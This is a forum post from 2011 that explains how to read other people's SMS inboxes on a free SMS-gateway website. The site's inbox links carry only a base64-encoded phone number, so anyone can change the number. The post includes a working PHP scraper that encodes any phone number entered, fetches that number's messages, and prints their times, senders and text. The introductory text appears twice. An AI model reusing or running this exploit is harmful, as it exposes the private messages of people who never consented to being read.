Look Inbox on Free sms www.sms-online.web.id 02-13-2011, 01:40 AM
#1
hello there meet again with me,,, last time i has this info from K4pT3N "explorecrew.org"
he give info how to see all sms on this operatot,, check these out
Just info, http://www.sms-online.web.id is a site that provides the facility to send free SMS to GSM or CDMA number.
oke after our previous use the site http://www.sms-online.web.id as an SMS Gateway to send sms through the bot, now let's see any kind of SMS sent by others to the phone number of our friends through the site.
After we send SMS from the site, a message will appear:
"Save this address, this address can be used to view inbox (incoming sms from 085 256 593 315), for day onwards
http://www.sms-online.web.id/sms/sms.htm...U2NTkzMzE1 "
Then there are also links to the following address:
http://www.sms-online.web.id/sms/sms.htm...U2NTkzMzE1
Looking at this address, see a code that has been encrypted using base64 encoding, which is code "MDg1MjU2NTkzMzE1", once decrypted, the code turned out to be 085 256 593 315 number which is the SMS destination number. So what if we change the number in fraudulent mobile numbers of our friends? yarp, if someone has ever sent an SMS to a mobile phone number of our friends, the message can be read.
coding it now...
hehe,, now you can see all sms inbox on this operator,,, so easyli...
Lets coding guys,,, oke
he give info how to see all sms on this operatot,, check these out
Just info, http://www.sms-online.web.id is a site that provides the facility to send free SMS to GSM or CDMA number.
oke after our previous use the site http://www.sms-online.web.id as an SMS Gateway to send sms through the bot, now let's see any kind of SMS sent by others to the phone number of our friends through the site.
After we send SMS from the site, a message will appear:
"Save this address, this address can be used to view inbox (incoming sms from 085 256 593 315), for day onwards
http://www.sms-online.web.id/sms/sms.htm...U2NTkzMzE1 "
Then there are also links to the following address:
http://www.sms-online.web.id/sms/sms.htm...U2NTkzMzE1
Looking at this address, see a code that has been encrypted using base64 encoding, which is code "MDg1MjU2NTkzMzE1", once decrypted, the code turned out to be 085 256 593 315 number which is the SMS destination number. So what if we change the number in fraudulent mobile numbers of our friends? yarp, if someone has ever sent an SMS to a mobile phone number of our friends, the message can be read.
coding it now...
Code:
<?php
function getSMS($hp,$content){
$url = "http://www.sms-online.web.id/sms/sms.html?d=".$content."&f=".$content.".list&Phonenumbers=".base64_encode($hp);
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);
$getSource = curl_exec($ch);
curl_close($ch);
$f1 = explode("STATUS",$getSource,2);
$f2 = explode(base64_decode("Z29vZ2xlX2FkX2NsaWVudA=="),$f1[1]);
$f3 = explode(htmlspecialchars("</td>"),htmlspecialchars($f2[0]));
$a=1;
for($i=1;$i<(count($f3)/7)+1;$i++){
echo "Pesan ke-".$i."<br>";
echo "Waktu: ".str_replace(htmlspecialchars("<td >"),"",htmlspecialchars($f3[2+(6*($i-1))]))." -- ".$i."<br>";
echo "Nomor: ".str_replace(htmlspecialchars("<td >"),"",htmlspecialchars($f3[4+(6*($i-1))]))." -- ".$i."<br>";
echo "Pesan: ".str_replace(htmlspecialchars("<td align="left" class="td_left" >"),"",htmlspecialchars($f3
[5+(6*($i-1))]))." -- ".$i."<br>";
$a++;
}
}
echo "<form name='f' method='post' action=''>
Masukkan No. HP : <input type='text' name='hp'><input type='submit' name='submit'>
</form>";
if(isset($_POST['submit'])){
$hp = $_POST['hp'];
$content = "sentitems";
getSMS($hp,$content);
}
?>
hehe,, now you can see all sms inbox on this operator,,, so easyli...
Lets coding guys,,, oke